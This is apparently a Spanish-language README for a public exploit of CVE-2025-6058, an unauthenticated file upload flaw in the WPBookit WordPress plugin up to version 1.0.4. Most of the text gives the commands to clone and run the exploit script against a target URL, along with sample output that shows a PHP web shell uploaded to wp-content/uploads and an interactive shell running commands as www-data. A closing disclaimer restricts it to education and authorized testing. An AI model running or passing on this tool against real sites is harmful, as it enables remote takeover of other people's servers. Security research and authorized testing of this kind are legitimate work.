
WordPress WPBookit ≤ 1.0.4 Exploit de subida de archivos sin autenticación
Exploit de Carga Arbitraria de Archivos No Autenticado dirigido al Plugin WPBookit de WordPress (≤ 1.0.4)
El exploit permite la carga remota de shell y la ejecución completa de comandos.
Autor: 0xgh057r3c0n
CVE-2025-6058 es una vulnerabilidad crítica que afecta al plugin WPBookit en WordPress CMS. Un atacante no autenticado puede abusar de un endpoint AJAX vulnerable para cargar archivos PHP arbitrarios, permitiendo Ejecución Remota de Código (RCE).
README.txtghost_shell.php)python3 --version
pip install requests
git clone https://github.com/0xgh057r3c0n/CVE-2025-6058.git
cd CVE-2025-6058
python3 CVE-2025-6058.py -u https://target-wordpress-site.com
python3 CVE-2025-6058.py -u https://victim.com
[>] Checking plugin version...
[+] Found plugin version: 1.0.4
[!] Target version is vulnerable.
[>] Uploading shell...
[+] Upload successful.
[+] Shell URL: https://victim.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami
[!] Interactive GhostShell Started — type 'exit' to quit.
┌─[gaurav@0xgh057r3c0n]─[/var/www/html]
└──╼ $ whoami
www-data
ghost_shell.php/wp-content/uploads/YYYY/MM/ghost_shell.phphttps://target-wordpress-site.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami
Este exploit ha sido desarrollado con fines educativos y únicamente para pruebas de penetración autorizadas. El uso no autorizado contra sistemas sin consentimiento explícito es ilegal.
Publicado bajo Licencia MIT
Hecho para auditoría de seguridad de WordPress 🛡️ por 0xgh057r3c0n